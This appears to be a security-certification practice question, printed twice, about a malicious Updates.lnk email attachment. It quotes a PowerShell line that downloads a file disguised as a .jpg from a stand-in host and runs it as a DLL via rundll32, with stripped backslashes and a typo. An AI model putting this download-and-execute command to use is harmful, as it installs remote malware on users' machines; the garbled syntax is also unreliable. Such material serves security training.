An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is
reverse engineering what the file does and finds that it executes the following script:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://
somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process
rundl132.exe $env:TEMPautoupdate.dll
Which of the following BEST describes what the analyst found?
A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
reverse engineering what the file does and finds that it executes the following script:
C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -URI https://
somehost.com/04EB18.jpg -OutFile $env:TEMPautoupdate.dll;Start-Process
rundl132.exe $env:TEMPautoupdate.dll
Which of the following BEST describes what the analyst found?
A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.